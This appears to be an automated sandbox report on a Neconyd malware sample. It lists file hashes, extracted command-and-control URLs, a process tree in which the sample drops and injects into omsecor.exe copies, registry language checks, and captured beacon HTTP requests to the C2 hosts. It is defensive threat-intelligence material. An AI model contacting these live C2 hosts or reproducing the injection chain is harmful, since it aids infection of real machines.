Analysis
-
max time kernel
115s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/01/2025, 23:24 UTC
Static task
static1
Behavioral task
behavioral1
Sample
ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe
Resource
win7-20240903-en
General
-
Target
ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe
-
Size
96KB
-
MD5
e5cab32bd5eab5060289bc0ea34f735c
-
SHA1
737c299f7b86fd4fbcbd0b5c1046f42ec09607c4
-
SHA256
ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339
-
SHA512
b6097459627e944cd6924ada9e029a34a439c61a3b48678016703dd15c96f243394ab5d3d47c0e3949eb314c70bb2633865c3927e394801d1a727ffab161d328
-
SSDEEP
1536:LnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxx7:LGs8cd8eXlYairZYqMddH137
Malware Config
Extracted
neconyd
http://ow5dirasuek.com/
http://mkkuei4kdsz.com/
http://lousta.net/
Signatures
-
Neconyd family
-
Executes dropped EXE 6 IoCs
pid Process 5036 omsecor.exe 5016 omsecor.exe 3628 omsecor.exe 4360 omsecor.exe 724 omsecor.exe 3116 omsecor.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\omsecor.exe omsecor.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4496 set thread context of 1236 4496 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 83 PID 5036 set thread context of 5016 5036 omsecor.exe 87 PID 3628 set thread context of 4360 3628 omsecor.exe 110 PID 724 set thread context of 3116 724 omsecor.exe 114 -
Program crash 4 IoCs
pid pid_target Process procid_target 4540 4496 WerFault.exe 82 4708 5036 WerFault.exe 86 4552 3628 WerFault.exe 109 4404 724 WerFault.exe 112 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language omsecor.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 4496 wrote to memory of 1236 4496 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 83 PID 4496 wrote to memory of 1236 4496 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 83 PID 4496 wrote to memory of 1236 4496 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 83 PID 4496 wrote to memory of 1236 4496 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 83 PID 4496 wrote to memory of 1236 4496 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 83 PID 1236 wrote to memory of 5036 1236 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 86 PID 1236 wrote to memory of 5036 1236 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 86 PID 1236 wrote to memory of 5036 1236 ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe 86 PID 5036 wrote to memory of 5016 5036 omsecor.exe 87 PID 5036 wrote to memory of 5016 5036 omsecor.exe 87 PID 5036 wrote to memory of 5016 5036 omsecor.exe 87 PID 5036 wrote to memory of 5016 5036 omsecor.exe 87 PID 5036 wrote to memory of 5016 5036 omsecor.exe 87 PID 5016 wrote to memory of 3628 5016 omsecor.exe 109 PID 5016 wrote to memory of 3628 5016 omsecor.exe 109 PID 5016 wrote to memory of 3628 5016 omsecor.exe 109 PID 3628 wrote to memory of 4360 3628 omsecor.exe 110 PID 3628 wrote to memory of 4360 3628 omsecor.exe 110 PID 3628 wrote to memory of 4360 3628 omsecor.exe 110 PID 3628 wrote to memory of 4360 3628 omsecor.exe 110 PID 3628 wrote to memory of 4360 3628 omsecor.exe 110 PID 4360 wrote to memory of 724 4360 omsecor.exe 112 PID 4360 wrote to memory of 724 4360 omsecor.exe 112 PID 4360 wrote to memory of 724 4360 omsecor.exe 112 PID 724 wrote to memory of 3116 724 omsecor.exe 114 PID 724 wrote to memory of 3116 724 omsecor.exe 114 PID 724 wrote to memory of 3116 724 omsecor.exe 114 PID 724 wrote to memory of 3116 724 omsecor.exe 114 PID 724 wrote to memory of 3116 724 omsecor.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe"C:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exeC:\Users\Admin\AppData\Local\Temp\ea84047f7ad04011ee062836ffad1f668051e5644e2103e3bb5e60e2eedbf339.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Users\Admin\AppData\Roaming\omsecor.exeC:\Users\Admin\AppData\Roaming\omsecor.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Roaming\omsecor.exeC:\Users\Admin\AppData\Roaming\omsecor.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\SysWOW64\omsecor.exeC:\Windows\System32\omsecor.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\SysWOW64\omsecor.exeC:\Windows\SysWOW64\omsecor.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Users\Admin\AppData\Roaming\omsecor.exeC:\Users\Admin\AppData\Roaming\omsecor.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Users\Admin\AppData\Roaming\omsecor.exeC:\Users\Admin\AppData\Roaming\omsecor.exe8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 724 -s 2688⤵
- Program crash
PID:4404
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 2926⤵
- Program crash
PID:4552
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 3004⤵
- Program crash
PID:4708
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 2642⤵
- Program crash
PID:4540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4496 -ip 44961⤵PID:1416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5036 -ip 50361⤵PID:2984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3628 -ip 36281⤵PID:3884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 724 -ip 7241⤵PID:2800
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Requestlousta.netIN AResponselousta.netIN A193.166.255.171
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request86.49.80.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request140.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request167.173.78.104.in-addr.arpaIN PTRResponse167.173.78.104.in-addr.arpaIN PTRa104-78-173-167deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request104.219.191.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request20.49.80.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestmkkuei4kdsz.comIN AResponsemkkuei4kdsz.comIN A3.33.243.145mkkuei4kdsz.comIN A15.197.204.56
-
Remote address:3.33.243.145:80RequestGET /224/21.html HTTP/1.1
From: 133819393747309207
Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>02d_af_96_0d.4c/1c661^c23bc-04c6
Host: mkkuei4kdsz.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
date: Tue, 21 Jan 2025 13:23:58 GMT
content-length: 114
-
Remote address:8.8.8.8:53Request145.243.33.3.in-addr.arpaIN PTRResponse145.243.33.3.in-addr.arpaIN PTRa3edc0dabdef92d6dawsglobalacceleratorcom
-
Remote address:8.8.8.8:53Requestow5dirasuek.comIN AResponseow5dirasuek.comIN A52.34.198.229
-
Remote address:52.34.198.229:80RequestGET /827/650.html HTTP/1.1
From: 133819393747309207
Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>02d_af_96_0d.4c/1c661^c23bc-04c6
Host: ow5dirasuek.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Tue, 21 Jan 2025 13:24:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0f0d6f49eafd2f0f48d5814482ebe3de|181.215.176.83|1737465848|1737465848|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:8.8.8.8:53Request229.198.34.52.in-addr.arpaIN PTRResponse229.198.34.52.in-addr.arpaIN PTRec2-52-34-198-229 us-west-2compute amazonawscom
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
260 B 5
-
260 B 5
-
466 B 388 B 6 4
HTTP Request
GET http://mkkuei4kdsz.com/224/21.htmlHTTP Response
200 -
467 B 631 B 6 5
HTTP Request
GET http://ow5dirasuek.com/827/650.htmlHTTP Response
200 -
260 B 5
-
156 B 3
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
lousta.net
DNS Response
193.166.255.171
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
86.49.80.91.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
140.32.126.40.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
167.173.78.104.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
104.219.191.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
232.168.11.51.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
20.49.80.91.in-addr.arpa
-
61 B 93 B 1 1
DNS Request
mkkuei4kdsz.com
DNS Response
3.33.243.14515.197.204.56
-
71 B 127 B 1 1
DNS Request
145.243.33.3.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
ow5dirasuek.com
DNS Response
52.34.198.229
-
72 B 135 B 1 1
DNS Request
229.198.34.52.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
96KB
MD5360ce3a33c680076b20025ee501bfe02
SHA1508c0c9f4df423a10172f730a82c6e9ec2e8fcef
SHA256ab2c92aa7a475a83613c9ba3393a1f63016feb6fd10e96aa365c6b0eafe8624a
SHA512e6ddc4d87e0bb5e2adfe85724c72881edd8c529bb0bc7164a1ef59af6e468e699f048bc832efb0a7dc26421eea8b9523b5fe9f31f74982cca1a308008037a13a
-
Filesize
96KB
MD59ee8b565267a990277bef46a8dc43dd9
SHA108e93fd4cfa911bb196f66b828044a9002d307ae
SHA256231c819c8f69b1ad891c72e62529dff9654c9229ecc9172943a7a885d06a2bc4
SHA512d1736477561bcbad128dda4f14821fbdcde079dce74e5097cf1822aa5676146e78a7abbbbcdfcd8032ba8bb317b9efdd5775f0dcf29e7308ea4d6c8b33f21e3c
-
Filesize
96KB
MD5a914ebad03a744edcf1a726d8a4d68ee
SHA1801eda3b189058b074055b592d26995ddb724737
SHA25674553524368e057db36e850da08f26bb8f28519dbabf059752a981460535db49
SHA5120ddce33a723b17a9077c2439af3c28ab0ba44ee6ab8bd56930545736eddcd2d55b4ec8b222aaf821a6d3a59d823d83ed3c2c620f362d001183b0c99648759477